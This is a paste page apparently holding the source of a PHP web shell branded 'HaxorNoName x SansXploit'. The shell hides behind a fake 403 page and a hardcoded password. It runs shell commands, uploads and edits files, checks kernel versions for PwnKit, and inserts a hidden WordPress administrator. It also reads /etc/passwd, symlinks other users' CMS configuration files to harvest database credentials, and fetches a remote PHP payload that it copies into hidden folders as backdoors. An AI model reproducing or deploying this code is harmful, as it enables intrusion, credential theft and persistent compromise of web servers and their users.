Pastebin Clone
Home
Create Paste
Create Paste
Title
Content
<?php error_reporting(0); ini_set('display_errors', 0); date_default_timezone_set('UTC'); // HIDDEN SHELL ACCESS - Only accessible via ?Xcr00t parameter if (!isset($_GET['Xcr00t'])) { // Show 403 Forbidden page header('HTTP/1.0 403 Forbidden'); ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>403 Forbidden </title> <style> * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Poppins', sans-serif; } body { height: 100vh; display: flex; justify-content: center; align-items: center; background: radial-gradient(circle at top, #0a0014, #120022, #1a002f); color: #fff; overflow: hidden; text-align: center; animation: bgflow 10s ease infinite; } @keyframes bgflow { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } .container { background: rgba(30, 0, 50, 0.6); border: 1px solid rgba(200, 0, 255, 0.3); border-radius: 20px; padding: 50px; max-width: 600px; box-shadow: 0 0 25px rgba(150, 0, 255, 0.4); backdrop-filter: blur(15px); animation: fadeIn 1.2s ease; } @keyframes fadeIn { from { opacity: 0; transform: scale(0.95); } to { opacity: 1; transform: scale(1); } } .lock { font-size: 90px; color: #b100ff; text-shadow: 0 0 25px #b100ff, 0 0 50px #7f00ff; animation: pulse 2.5s infinite ease-in-out; } @keyframes pulse { 0% { transform: scale(1); opacity: 1; } 50% { transform: scale(1.08); opacity: 0.8; } 100% { transform: scale(1); opacity: 1; } } h1 { font-size: 6rem; margin: 10px 0; background: linear-gradient(90deg, #b100ff, #ff00ff, #7f00ff); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 30px rgba(180, 0, 255, 0.5); } h2 { font-size: 1.8rem; font-weight: 300; color: #c9a9ff; margin-bottom: 20px; } .code { display: inline-block; background: rgba(100, 0, 150, 0.25); border: 1px solid rgba(200, 0, 255, 0.4); padding: 10px 25px; border-radius: 50px; color: #d09bff; margin-bottom: 25px; font-size: 1rem; } p { font-size: 1.1rem; line-height: 1.7; color: #d3c3ff; margin-bottom: 25px; } .actions { display: flex; justify-content: center; gap: 15px; flex-wrap: wrap; } .btn { text-decoration: none; padding: 12px 30px; border-radius: 50px; font-weight: 600; transition: all 0.3s ease; } .btn-primary { background: linear-gradient(90deg, #b100ff, #7f00ff); color: #fff; box-shadow: 0 0 20px rgba(150, 0, 255, 0.5); } .btn-secondary { border: 1px solid rgba(255,255,255,0.3); color: #c9a9ff; background: transparent; } .btn:hover { transform: translateY(-3px); box-shadow: 0 0 25px rgba(190, 0, 255, 0.5); } footer { position: absolute; bottom: 15px; width: 100%; text-align: center; font-size: 0.85rem; color: rgba(255,255,255,0.4); } footer span { color: #b100ff; font-weight: 600; } @media (max-width: 768px) { .container { padding: 30px 20px; } h1 { font-size: 4rem; } .actions { flex-direction: column; } } </style> </head> <body> <div class="container"> <div class="lock">🔒</div> <h1>403</h1> <h2>Akses Dilarang</h2> <div class="code">Error 403: Forbidden</div> <p>Kamu tidak memiliki izin untuk mengakses halaman ini.<br> Jika kamu yakin ini kesalahan, hubungi administrator sistem.</p> <div class="actions"> <a href="/" class="btn btn-primary">🏠 Ke Halaman Utama</a> <a href="javascript:history.back()" class="btn btn-secondary">⬅️ Kembali</a> </div> </div> </body> </html> <?php exit; } // SansXploit SHELL - Authentication Required session_start(); $auth_password = 'BabyXcr00t'; // Şifre buraya if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { if (isset($_POST['password']) && $_POST['password'] === $auth_password) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF'] . '?Xcr00t'); exit; } // Login form ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Xcr00toname x SansXploit</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%), radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%), radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%), linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%); color: #e6e6ff; font-family: 'Rajdhani', 'Courier New', monospace; min-height: 100vh; overflow: hidden; position: relative; } /* NEURAL NETWORK BACKGROUND */ .neural-network { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 0; } /* CYBER GRID */ .cyber-grid { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(90deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%), linear-gradient(0deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%); background-size: 50px 50px; z-index: 1; } /* MAIN CONTAINER */ .quantum-terminal { position: relative; z-index: 10; max-width: 800px; margin: 50px auto; background: rgba(10, 5, 25, 0.7); border: 1px solid rgba(138, 43, 226, 0.3); border-radius: 20px; backdrop-filter: blur(15px); box-shadow: 0 0 100px rgba(138, 43, 226, 0.2), inset 0 0 50px rgba(138, 43, 226, 0.1); overflow: hidden; } /* TERMINAL HEADER */ .terminal-header { background: linear-gradient(90deg, rgba(138, 43, 226, 0.2), rgba(148, 0, 211, 0.2)); padding: 20px 30px; border-bottom: 1px solid rgba(138, 43, 226, 0.3); position: relative; } .header-glow { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(90deg, transparent, rgba(138, 43, 226, 0.1), transparent); animation: headerScan 3s linear infinite; } @keyframes headerScan { 0% { transform: translateX(-100%); } 100% { transform: translateX(100%); } } .title-main { font-size: 2.8em; font-weight: 700; background: linear-gradient(45deg, #da70d6, #8a2be2, #4b0082); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 30px rgba(138, 43, 226, 0.5); letter-spacing: 3px; text-transform: uppercase; } .title-sub { font-size: 1.1em; color: #c9a0ff; margin-top: 5px; letter-spacing: 8px; font-weight: 300; } /* ACCESS PANEL */ .access-panel { padding: 60px 40px; text-align: center; } .security-level { display: inline-block; background: rgba(138, 43, 226, 0.2); border: 1px solid #8a2be2; padding: 10px 20px; border-radius: 25px; margin-bottom: 40px; font-size: 0.9em; color: #da70d6; letter-spacing: 2px; } .password-container { position: relative; margin: 40px 0; } .password-input { background: rgba(20, 10, 40, 0.6); border: 2px solid #8a2be2; border-radius: 15px; padding: 25px 30px; width: 100%; max-width: 500px; font-size: 18px; color: #e6ccff; font-family: 'Courier New', monospace; letter-spacing: 3px; transition: all 0.3s ease; outline: none; } .password-input:focus { box-shadow: 0 0 40px rgba(138, 43, 226, 0.4), inset 0 0 20px rgba(138, 43, 226, 0.1); border-color: #da70d6; transform: scale(1.02); } .input-glow { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border-radius: 15px; background: linear-gradient(45deg, transparent, rgba(138, 43, 226, 0.1), transparent); animation: inputPulse 2s ease-in-out infinite; pointer-events: none; } @keyframes inputPulse { 0%, 100% { opacity: 0.3; } 50% { opacity: 0.7; } } /* QUANTUM BUTTON */ .quantum-button { background: linear-gradient(135deg, #8a2be2, #9400d3, #4b0082); border: none; border-radius: 15px; padding: 20px 50px; font-size: 18px; font-weight: 600; color: white; cursor: pointer; transition: all 0.3s ease; position: relative; overflow: hidden; text-transform: uppercase; letter-spacing: 2px; margin-top: 20px; } .quantum-button::before { content: ''; position: absolute; top: -50%; left: -50%; width: 200%; height: 200%; background: linear-gradient(45deg, transparent, rgba(255,255,255,0.1), transparent); transform: rotate(45deg); transition: all 0.6s ease; } .quantum-button:hover::before { transform: rotate(45deg) translate(50%, 50%); } .quantum-button:hover { transform: translateY(-5px); box-shadow: 0 15px 30px rgba(138, 43, 226, 0.4), 0 5px 15px rgba(138, 43, 226, 0.3); } /* STATUS INDICATOR */ .status-indicator { display: flex; align-items: center; justify-content: center; margin-top: 30px; gap: 15px; } .status-dot { width: 12px; height: 12px; border-radius: 50%; background: #8a2be2; animation: statusPulse 1.5s ease-in-out infinite; } .status-dot:nth-child(2) { animation-delay: 0.5s; } .status-dot:nth-child(3) { animation-delay: 1s; } @keyframes statusPulse { 0%, 100% { opacity: 0.3; transform: scale(0.8); } 50% { opacity: 1; transform: scale(1.2); box-shadow: 0 0 20px #8a2be2; } } /* ERROR MESSAGE */ .quantum-error { color: #ff6b6b; margin-top: 25px; font-size: 16px; text-shadow: 0 0 10px rgba(255, 107, 107, 0.5); animation: quantumError 0.6s ease-out; background: rgba(255, 107, 107, 0.1); padding: 15px; border-radius: 10px; border: 1px solid rgba(255, 107, 107, 0.3); } @keyframes quantumError { 0% { transform: translateY(-20px); opacity: 0; } 100% { transform: translateY(0); opacity: 1; } } /* FOOTER */ .terminal-footer { background: rgba(10, 5, 25, 0.8); padding: 20px; border-top: 1px solid rgba(138, 43, 226, 0.2); text-align: center; font-size: 0.9em; color: #9370db; letter-spacing: 1px; } .footer-text { display: flex; justify-content: center; gap: 30px; flex-wrap: wrap; } /* RESPONSIVE */ @media (max-width: 768px) { .quantum-terminal { margin: 20px; border-radius: 15px; } .title-main { font-size: 2em; } .access-panel { padding: 40px 20px; } .password-input { padding: 20px; font-size: 16px; } } </style> </head> <body> <!-- NEURAL NETWORK BACKGROUND --> <canvas class="neural-network" id="neuralNetwork"></canvas> <div class="cyber-grid"></div> <!-- QUANTUM TERMINAL --> <div class="quantum-terminal"> <!-- TERMINAL HEADER --> <div class="terminal-header"> <div class="header-glow"></div> <div class="title-main"> HaxorNoName x SansXploit</div> <div class="title-sub">Pencuri Dilarang Masuk</div> </div> <!-- ACCESS PANEL --> <div class="access-panel"> <div class="security-level"> Welcome To Hidden Shell </div> <form method="post"> <div class="password-container"> <input type="password" name="password" class="password-input" placeholder="ENTER QUANTUM KEY..." required> <div class="input-glow"></div> </div> <button type="submit" class="quantum-button"> Press To Login </button> </form> <?php if (isset($_POST['password'])): ?> <div class="quantum-error"> ⚠️ KEY REJECTED - ACCESS DENIED </div> <?php endif; ?> <!-- STATUS INDICATOR --> <div class="status-indicator"> <div class="status-dot"></div> <div class="status-dot"></div> <div class="status-dot"></div> </div> </div> <!-- TERMINAL FOOTER --> <div class="terminal-footer"> <div class="footer-text"> <span>Xcr00toname x SansXploit</span> <span>No System Is Safe</span> </div> </div> </div> <script> // NEURAL NETWORK ANIMATION const canvas = document.getElementById('neuralNetwork'); const ctx = canvas.getContext('2d'); function resizeCanvas() { canvas.width = window.innerWidth; canvas.height = window.innerHeight; } resizeCanvas(); window.addEventListener('resize', resizeCanvas); class Node { constructor(x, y) { this.x = x; this.y = y; this.vx = (Math.random() - 0.5) * 0.5; this.vy = (Math.random() - 0.5) * 0.5; this.radius = Math.random() * 2 + 1; } update() { this.x += this.vx; this.y += this.vy; if (this.x < 0 || this.x > canvas.width) this.vx *= -1; if (this.y < 0 || this.y > canvas.height) this.vy *= -1; } draw() { ctx.beginPath(); ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2); ctx.fillStyle = `rgba(138, 43, 226, ${0.3 + Math.random() * 0.2})`; ctx.fill(); } } class Connection { constructor(node1, node2) { this.node1 = node1; this.node2 = node2; this.length = Math.hypot(node1.x - node2.x, node1.y - node2.y); } draw() { const dx = this.node1.x - this.node2.x; const dy = this.node1.y - this.node2.y; const distance = Math.sqrt(dx * dx + dy * dy); if (distance < 200) { ctx.beginPath(); ctx.moveTo(this.node1.x, this.node1.y); ctx.lineTo(this.node2.x, this.node2.y); ctx.strokeStyle = `rgba(138, 43, 226, ${0.1 * (1 - distance / 200)})`; ctx.lineWidth = 0.5; ctx.stroke(); } } } const nodes = []; const connections = []; // Create nodes for (let i = 0; i < 50; i++) { nodes.push(new Node( Math.random() * canvas.width, Math.random() * canvas.height )); } // Create connections for (let i = 0; i < nodes.length; i++) { for (let j = i + 1; j < nodes.length; j++) { connections.push(new Connection(nodes[i], nodes[j])); } } function animate() { ctx.fillStyle = 'rgba(10, 5, 25, 0.05)'; ctx.fillRect(0, 0, canvas.width, canvas.height); nodes.forEach(node => { node.update(); node.draw(); }); connections.forEach(connection => { connection.draw(); }); requestAnimationFrame(animate); } animate(); // Add typing effect to password placeholder const passwordInput = document.querySelector('.password-input'); const originalPlaceholder = 'ENTER PASS KEY...'; let placeholderText = ''; let charIndex = 0; let isDeleting = false; function typePlaceholder() { if (isDeleting) { placeholderText = originalPlaceholder.substring(0, placeholderText.length - 1); } else { placeholderText = originalPlaceholder.substring(0, placeholderText.length + 1); } passwordInput.placeholder = placeholderText + '█'; if (!isDeleting && placeholderText === originalPlaceholder) { setTimeout(() => isDeleting = true, 1000); } else if (isDeleting && placeholderText === '') { isDeleting = false; setTimeout(typePlaceholder, 500); return; } setTimeout(typePlaceholder, isDeleting ? 50 : 100); } // Start typing effect when page loads setTimeout(typePlaceholder, 1000); </script> </body> </html> <?php exit; } function show_notification($message, $type = 'danger') { echo '<div class="notification-overlay" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.7); z-index: 9999; display: flex; justify-content: center; align-items: center;"> <div class="alert alert-' . $type . ' notification-box" style="max-width: 500px; width: 90%;"> <button type="button" class="btn-close float-end" onclick="this.parentElement.parentElement.remove()"></button> <p class="text-center mb-0">' . htmlspecialchars($message) . '</p> </div> </div>'; } function create_403bp($url, $path) { $randname = uniqid('aurora_', true) . '.php'; $target = $path . DIRECTORY_SEPARATOR . $randname; // Try wget first $wget_cmd = "wget '{$url}' -O '{$target}' 2>&1"; @exec($wget_cmd, $output, $return_var); if ($return_var === 0 && file_exists($target)) { return $randname; } // Try curl if wget fails $ch = curl_init($url); $fp = fopen($target, 'w+'); if ($ch && $fp) { curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if (curl_exec($ch)) { fclose($fp); curl_close($ch); return $randname; } fclose($fp); curl_close($ch); } return false; } const APP_NAME = 'HaxorNoName x SansXploit'; const APP_VERSION = '3'; const SCAN_READ_LIMIT = 5000; $current_version = '3'; if (version_compare(PHP_VERSION, '5.4.0', '<')) { die('PHP version 5.4 or higher required'); } $required_extensions = ['mysqli', 'curl', 'json']; foreach ($required_extensions as $ext) { if (!extension_loaded($ext)) { die("Required PHP extension '{$ext}' is not loaded"); } } header('Content-Type: text/html; charset=UTF-8'); if (ini_get('memory_limit') < 256) { @ini_set('memory_limit', '256M'); } function customErrorHandler($errno, $errstr, $errfile, $errline) { if (!(error_reporting() & $errno)) { return false; } switch ($errno) { case E_ERROR: case E_CORE_ERROR: case E_COMPILE_ERROR: case E_PARSE: $error_type = 'Fatal Error'; break; case E_WARNING: case E_CORE_WARNING: case E_COMPILE_WARNING: case E_USER_WARNING: $error_type = 'Warning'; break; case E_NOTICE: case E_USER_NOTICE: $error_type = 'Notice'; break; default: $error_type = 'Unknown'; break; } error_log("PHP {$error_type}: {$errstr} in {$errfile} on line {$errline}"); if ($errno == E_ERROR || $errno == E_CORE_ERROR || $errno == E_COMPILE_ERROR || $errno == E_PARSE) { die("A critical error occurred. Please check the error logs."); } return true; } set_error_handler("customErrorHandler"); $required_paths = [__DIR__, sys_get_temp_dir()]; foreach ($required_paths as $path) { if (!is_writable($path)) { die("Directory not writable: {$path}"); } } if (!isset($_SESSION) && !headers_sent()) { session_start(); } ini_set('max_execution_time', 30); ini_set('memory_limit', '256M'); ini_set('realpath_cache_size', '4096k'); ini_set('realpath_cache_ttl', 600); function checkUpdate() { return; } const SYMLINK_DIR = 'AuroraSym'; const PERL_DIR = 'perl'; function fmtSize($bytes) { static $types = ['B', 'KB', 'MB', 'GB', 'TB']; static $cache = []; $key = (string)$bytes; if (isset($cache[$key])) { return $cache[$key]; } for ($i = 0; $bytes >= 1024 && $i < 4; $bytes /= 1024, $i++); $result = round($bytes, 2) . ' ' . $types[$i]; $cache[$key] = $result; return $result; } function ext($file) { return strtolower(pathinfo($file, PATHINFO_EXTENSION)); } function icon($file) { static $iconCache = []; static $icons = [ 'php' => '<i class="fa-brands fa-php text-indigo"></i>', 'html' => '<i class="fa-brands fa-html5 text-danger"></i>', 'css' => '<i class="fa-brands fa-css3 text-primary"></i>', 'js' => '<i class="fa-brands fa-js text-warning"></i>', 'py' => '<i class="fa-brands fa-python text-warning"></i>', '.htaccess' => '<i class="fa-solid fa-lock text-danger"></i>', 'image' => '<i class="fa-regular fa-image text-success"></i>', 'default' => '<i class="fa-solid fa-file text-muted"></i>' ]; if (isset($iconCache[$file])) { return $iconCache[$file]; } if ($file === '.htaccess') { return $iconCache[$file] = $icons['.htaccess']; } $ext = ext($file); if (isset($icons[$ext])) { return $iconCache[$file] = $icons[$ext]; } if (in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'webp'])) { return $iconCache[$file] = $icons['image']; } return $iconCache[$file] = $icons['default']; } function enc($path) { return base64_encode($path); } function dec($path) { return base64_decode($path); } function perms($file) { return substr(sprintf('%o', fileperms($file)), -4); } function suggest_exploit() { $uname = php_uname(); $parts = explode(" ", $uname); $kernel = isset($parts[2]) ? $parts[2] : '0.0.0'; $version = explode("-", $kernel)[0]; $numbers = explode(".", $version); $major = isset($numbers[0]) ? $numbers[0] : '0'; $minor = isset($numbers[1]) ? $numbers[1] : '0'; $patch = isset($numbers[2]) ? $numbers[2] : '0'; return "$major.$minor.$patch"; } function check_pwnkit_compatibility() { $kernel = suggest_exploit(); $compatible_versions = [ '2.6.', '3.0.', '3.1.', '3.2.', '3.3.', '3.4.', '3.5.', '3.6.', '3.7.', '3.8.', '3.9.', '3.10.', '3.11.', '3.12.', '3.13.', '3.14.', '3.15.', '3.16.', '3.17.', '3.18.', '3.19.', '4.0.', '4.1.', '4.2.', '3.3.', '4.4.', '4.5.', '4.6.', '4.7.', '4.8.', '4.9.', '4.10.', '4.11.', '4.12.', '4.13.', '4.14.', '4.15.', '4.16.', '4.17.', '4.18.', '4.19.', '5.0.', '5.1.', '5.2.', '5.3.' ]; foreach ($compatible_versions as $version) { if (strpos($kernel, $version) === 0) { return true; } } return false; } function cmd($command) { try { $output = ''; // Sanitize command input $command = escapeshellcmd($command); // Check if command execution is allowed if (ini_get('safe_mode') || !function_exists('exec')) { throw new Exception('Command execution is disabled'); } // Try different command execution methods if (function_exists('exec')) { exec($command . ' 2>&1', $output_array, $return_var); if ($return_var !== 0) { throw new Exception("Command failed with code: {$return_var}"); } $output = implode("\n", $output_array); } elseif (function_exists('shell_exec')) { $output = shell_exec($command . ' 2>&1'); if ($output === null) { throw new Exception('Command execution failed'); } } elseif (function_exists('system')) { ob_start(); system($command . ' 2>&1', $return_var); $output = ob_get_clean(); if ($return_var !== 0) { throw new Exception("Command failed with code: {$return_var}"); } } else { throw new Exception('No command execution function available'); } return $output; } catch (Exception $e) { error_log("Command execution error: " . $e->getMessage()); return "Error: " . $e->getMessage(); } } function addWordpressAdmin($dbHost, $dbUser, $dbPass, $dbName, $wpUser, $wpPass) { try { $conn = new mysqli($dbHost, $dbUser, $dbPass, $dbName); if ($conn->connect_error) return false; $hashedPass = password_hash($wpPass, PASSWORD_DEFAULT); $sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES (?, ?, ?, ?, NOW(), ?)"; $stmt = $conn->prepare($sql); $stmt->bind_param("sssss", $wpUser, $hashedPass, $wpUser, "admin@local.host", $wpUser); if ($stmt->execute()) { $userId = $stmt->insert_id; $metaSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $capabilities = serialize(array('administrator' => true)); $metaStmt = $conn->prepare($metaSql); $metaStmt->bind_param("iss", $userId, "wp_capabilities", $capabilities); $metaStmt->execute(); $levelSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, '10')"; $levelStmt = $conn->prepare($levelSql); $levelStmt->bind_param("is", $userId, "wp_user_level"); $levelStmt->execute(); return true; } return false; } catch (Exception $e) { return false; } } function generatePhpIni() { return file_put_contents(__DIR__ . DIRECTORY_SEPARATOR . 'php.ini', "disable_functions=none\n") !== false; } function initSymlinkContainer() { if (!is_dir(SYMLINK_DIR)) mkdir(SYMLINK_DIR, 0777, true); $hta = SYMLINK_DIR . DIRECTORY_SEPARATOR . '.htaccess'; if (!file_exists($hta)) { $rules = "Options +FollowSymLinks +Indexes\nOrder Allow,Deny\nAllow from all\nRequire all granted\n"; file_put_contents($hta, $rules); } // Ensure proper permissions chmod(SYMLINK_DIR, 0755); if (file_exists($hta)) { chmod($hta, 0644); } } function createSymlink($src, $alias) { if (!function_exists('symlink')) { show_notification('Symlink function is not enabled on this server'); return false; } $target = SYMLINK_DIR . DIRECTORY_SEPARATOR . $alias; if (!file_exists($target)) { if (!@symlink($src, $target)) { show_notification('Failed to create symlink. Check permissions.'); return false; } return true; } return true; } function manualSymlink($src, $alias) { initSymlinkContainer(); createSymlink($src, $alias); } function extractSystemUsers() { $users = []; $passwdFile = '/etc/passwd'; if (file_exists($passwdFile) && is_readable($passwdFile)) { foreach (file($passwdFile) as $line) { $cols = explode(':', $line); if (count($cols) >= 3) { $name = $cols[0]; $uid = (int)$cols[2]; if ($uid >= 500) $users[] = $name; } } } return array_unique($users); } function massSymlinkConfigs($usernames) { initSymlinkContainer(); if (!file_exists(SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root')) @symlink('/', SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root'); $patterns = [ 'wp-config' => '/public_html/wp-config.php', 'word-wp' => '/public_html/wordpress/wp-config.php', 'wpblog' => '/public_html/blog/wp-config.php', 'wp-old' => '/public_html/wp/wp-config.php', 'wp-backup' => '/public_html/backup/wp-config.php', 'wp-old2' => '/public_html/old/wp-config.php', 'wp-2020' => '/public_html/2020/wp-config.php', 'wp-2021' => '/public_html/2021/wp-config.php', 'wp-2022' => '/public_html/2022/wp-config.php', 'wp-2023' => '/public_html/2023/wp-config.php', 'wp-new' => '/public_html/new/wp-config.php', 'wp-dev' => '/public_html/dev/wp-config.php', 'wp-stage' => '/public_html/staging/wp-config.php', 'wp-test' => '/public_html/test/wp-config.php', 'joomla-or-whmcs'=> '/public_html/configuration.php', 'joomla' => '/public_html/joomla/configuration.php', 'joomla-old' => '/public_html/old/configuration.php', 'joomla-backup' => '/public_html/backup/configuration.php', 'joomla-dev' => '/public_html/dev/configuration.php', 'vbinc' => '/public_html/vb/includes/config.php', 'vb' => '/public_html/includes/config.php', 'vb-old' => '/public_html/old/includes/config.php', 'vb-backup' => '/public_html/backup/includes/config.php', 'conf_global' => '/public_html/conf_global.php', 'inc' => '/public_html/inc/config.php', 'config' => '/public_html/config.php', 'Settings' => '/public_html/Settings.php', 'sites' => '/public_html/sites/default/settings.php', 'whm' => '/public_html/whm/configuration.php', 'whmcs' => '/public_html/whmcs/configuration.php', 'supportwhmcs' => '/public_html/support/configuration.php', 'WHM' => '/public_html/whmc/WHM/configuration.php', 'whmc' => '/public_html/whm/WHMCS/configuration.php', 'WHMcs' => '/public_html/whm/whmcs/configuration.php', 'whmcsupp' => '/public_html/support/configuration.php', 'whmcs-cli' => '/public_html/clients/configuration.php', 'whmcs-cl' => '/public_html/client/configuration.php', 'whmcs-CL' => '/public_html/clientes/configuration.php', 'whmcs-Cl' => '/public_html/cliente/configuration.php', 'whmcs-csup' => '/public_html/clientsupport/configuration.php', 'whmcs-bill' => '/public_html/billing/configuration.php', 'whmcs-old' => '/public_html/old/configuration.php', 'whmcs-backup' => '/public_html/backup/configuration.php', 'admin-conf' => '/public_html/admin/config.php', 'admin-old' => '/public_html/admin/old/config.php', 'admin-backup' => '/public_html/admin/backup/config.php', 'home1-wp' => '/home1/public_html/wp-config.php', 'home2-wp' => '/home2/public_html/wp-config.php', 'home3-wp' => '/home3/public_html/wp-config.php', 'home4-wp' => '/home4/public_html/wp-config.php', 'home5-wp' => '/home5/public_html/wp-config.php', 'html-wp' => '/html/wp-config.php', 'html-pub-wp' => '/html/public/wp-config.php', 'www-wp' => '/www/wp-config.php', 'www-pub-wp' => '/www/public/wp-config.php' ]; foreach ($usernames as $user) { $user = trim($user); if ($user === '') continue; foreach ($patterns as $postfix => $path) { createSymlink("/home/" . $user . $path, $user . ".." . $postfix); } } } $current_dir = dirname(__FILE__); $path = isset($_GET['p']) ? dec($_GET['p']) : $current_dir; if (!is_dir($path)) { $path = $current_dir; } define('PATH', $path); $action = isset($_GET['act']) ? $_GET['act'] : 'list'; $target = isset($_GET['file']) ? $_GET['file'] : ''; if (isset($_POST['upload'])) { $dest = PATH . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; } $url1 = 'https://aurorafilemanager.github.io/Aurora.php'; function download_content($url) { try { // Validate URL if (!filter_var($url, FILTER_VALIDATE_URL)) { throw new Exception("Invalid URL format"); } // Set timeout and user agent $ctx = stream_context_create([ 'http' => [ 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'follow_location' => true ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); // Try file_get_contents first $content = @file_get_contents($url, false, $ctx); if ($content !== false) { return $content; } // Try cURL if file_get_contents fails if (function_exists('curl_init')) { $content = download_content_with_curl($url); if ($content !== false) { return $content; } } // Try fopen as last resort $content = download_content_with_fopen($url); if ($content !== false) { return $content; } throw new Exception("All download methods failed"); } catch (Exception $e) { error_log("Download error: " . $e->getMessage()); throw new Exception("Failed to download content: " . $e->getMessage()); } } function download_content_with_curl($url) { try { $ch = curl_init($url); if ($ch === false) { throw new Exception("Failed to initialize cURL"); } curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 5, CURLOPT_TIMEOUT => 30, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $content = curl_exec($ch); $error = curl_error($ch); $errno = curl_errno($ch); curl_close($ch); if ($content === false) { throw new Exception("cURL error ({$errno}): {$error}"); } return $content; } catch (Exception $e) { error_log("cURL error: " . $e->getMessage()); return false; } } function download_content_with_fopen($url) { try { $content = ''; $handle = @fopen($url, 'r'); if ($handle === false) { throw new Exception("Failed to open URL"); } stream_set_timeout($handle, 30); while (!feof($handle)) { $chunk = fread($handle, 8192); if ($chunk === false) { throw new Exception("Failed to read from stream"); } $content .= $chunk; } fclose($handle); if (empty($content)) { throw new Exception("No content received"); } return $content; } catch (Exception $e) { error_log("fopen error: " . $e->getMessage()); return false; } } // Remove duplicate function definitions function get_full_url($filePath) { $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://"; $domainName = $_SERVER['HTTP_HOST']; $relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $filePath); return $protocol . $domainName . $relativePath; } function create_files_in_subdirectories($rootDir, $url) { try { // Validate inputs if (!is_dir($rootDir)) { throw new Exception("Invalid root directory"); } // Define common WordPress and system folders to create if they don't exist $folders_to_create = array( '.config', '.wp-content', '.wp-includes', '.wp-admin', '.system', '.tmp', '.cache', '.local' ); // Create hidden folders if they don't exist foreach ($folders_to_create as $folder) { $folder_path = $rootDir . DIRECTORY_SEPARATOR . $folder; if (!file_exists($folder_path)) {if (@mkdir($folder_path, 0755, true)) { // Set folder as hidden on Windows if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { @system("attrib +h \"$folder_path\""); } } } } // Get content first to avoid multiple downloads $content = download_content($url); if (!$content) { throw new Exception("Failed to download content from URL"); } $created = false; // Include both existing and newly created directories $subdirs = array_merge( array_filter(glob($rootDir . '/*', GLOB_ONLYDIR)), array_filter(glob($rootDir . '/.*', GLOB_ONLYDIR)) ); foreach ($subdirs as $subdir) { if (!is_writable($subdir)) { continue; } $dirName = basename($subdir); $randomName = uniqid($dirName . '_', true); $extensions = array('.php', '.inc.php', '.ini.php', '_function.php'); foreach ($extensions as $ext) { $filePath = $subdir . '/' . $randomName . $ext; if (!file_exists($filePath)) { if (file_put_contents($filePath, $content) !== false) { @chmod($filePath, 0644); $fullUrl = get_full_url($filePath); echo "<div class='alert alert-success'>Created: <a href='$fullUrl' target='_blank'>$fullUrl</a></div>"; $created = true; // Create .htaccess to protect the file $htaccess = $subdir . '/.htaccess'; if (!file_exists($htaccess)) { $rules = "Options -Indexes\nOrder Allow,Deny\nAllow from all\n"; @file_put_contents($htaccess, $rules); } break; // Successfully created one file in this directory } } } } if (!$created) { throw new Exception("Could not create any backup files. Check directory permissions."); } return true; } catch (Exception $e) { error_log("Backup creation error: " . $e->getMessage()); echo "<div class='alert alert-danger'>Error: " . htmlspecialchars($e->getMessage()) . "</div>"; return false; } } if (isset($_POST['newdir'])) { if (@mkdir(PATH . DIRECTORY_SEPARATOR . $_POST['dirname'], 0755)) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; } if (isset($_POST['newfile'])) { $file = PATH . DIRECTORY_SEPARATOR . $_POST['filename']; if (!file_exists($file) && file_put_contents($file, '') !== false) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&act=edit&file=' . urlencode($_POST['filename'])); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; 